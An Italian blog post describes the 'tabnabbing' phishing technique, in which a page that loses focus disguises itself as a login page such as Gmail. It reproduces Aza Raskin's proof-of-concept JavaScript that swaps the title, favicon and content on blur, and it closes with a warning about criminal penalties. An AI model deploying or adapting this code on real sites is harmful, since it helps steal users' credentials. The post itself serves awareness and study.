Quando si tratta di rubare, l'ingegno si aguzza sempre a quanto pare. Infatti non è più necessario cliccare il solito link fasullo per rischiare di essere vittima di furto di credenziali ora basta visitare o credere di farlo, una pagina anche importante, totalmente innocua, almeno per un po'.
La vulnerabilità sfruttata è nell'utente e non nello strumento informatico. Abusa della distrazione e della confusione che creiamo navigando e continuando ad aprire schede.
In sostanza la pagina, una volta perso il focus, muterà il suo aspetto, diventando la pagina phishing di un qualsiasi servizio, hotmail, paypal, ebay, postepay e via dicendo, ritrovandola potreste pensare ad un collegamento richiesto e non riuscito in precedenza ed inserirete i dati, che ovviamente prenderanno una strada diversa da quella che vi aspettereste, le vostre credenziali... non sono più un segreto, almeno per il phisher.
Per recuperare i vostri soldi useranno il solito metodo descritto più volte. Ho la conferma che è ancora in uso perchè solo ieri hanno dato notizia di studenti di un liceo milanese che in complicità con un gruppo rumeno avevano organizzato proprio questo sistema di recupero di somme provenienti da furti online.
Altra documentazione la trovate su Wikipedia
Ora qualcosa di più tecnico, il codice:
Copyright (c) 2010 Aza Raskin - http://azarask.in
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
(function(){ var TIMER = null; var HAS_SWITCHED = false; // Events window.onblur = function(){ TIMER = setTimeout(changeItUp, 5000); } window.onfocus = function(){ if(TIMER) clearTimeout(TIMER); } // Utils function setTitle(text){ document.title = text; } // This favicon object rewritten from: // Favicon.js - Change favicon dynamically [http://ajaxify.com/run/favicon]. // Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox and Opera. favicon = { docHead: document.getElementsByTagName("head")[0], set: function(url){ this.addLink(url); }, addLink: function(iconURL) { var link = document.createElement("link"); link.type = "image/x-icon"; link.rel = "shortcut icon"; link.href = iconURL; this.removeLinkIfExists(); this.docHead.appendChild(link); }, removeLinkIfExists: function() { var links = this.docHead.getElementsByTagName("link"); for (var i=0; i<links.length; i++) { var link = links[i]; if (link.type=="image/x-icon" && link.rel=="shortcut icon") { this.docHead.removeChild(link); return; // Assuming only one match at most. } } }, get: function() { var links = this.docHead.getElementsByTagName("link"); for (var i=0; i<links.length; i++) { var link = links[i]; if (link.type=="image/x-icon" && link.rel=="shortcut icon") { return link.href; } } } }; function createShield(){ div = document.createElement("div"); div.style.position = "fixed"; div.style.top = 0; div.style.left = 0; div.style.backgroundColor = "white"; div.style.width = "100%"; div.style.height = "100%"; div.style.textAlign = "center"; document.body.style.overflow = "hidden"; img = document.createElement("img"); img.style.paddingTop = "15px"; img.src = "http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png"; var oldTitle = document.title; var oldFavicon = favicon.get() || "/favicon.ico"; div.appendChild(img); document.body.appendChild(div); img.onclick = function(){ div.parentNode.removeChild(div); document.body.style.overflow = "auto"; setTitle(oldTitle); favicon.set(oldFavicon) } } function changeItUp(){ if( HAS_SWITCHED == false ){ createShield("https://mail.google.com"); setTitle( "Gmail: Email from Google"); favicon.set("https://mail.google.com/favicon.ico"); HAS_SWITCHED = true; } } })();
Per giustizia e gratitudine :) ... non avendo voglia di riscrivermi tutto il codice, l'ho grabbato al buon Sergetto, grazie quindi anche a lui. Mi raccomando, usatelo a scopo di studio o come idea illuminante per perseguire nuove strade di ricerca, ... non sta a me ricordarvi che l'uso malevolo comporta sanzioni penali, e non da poco.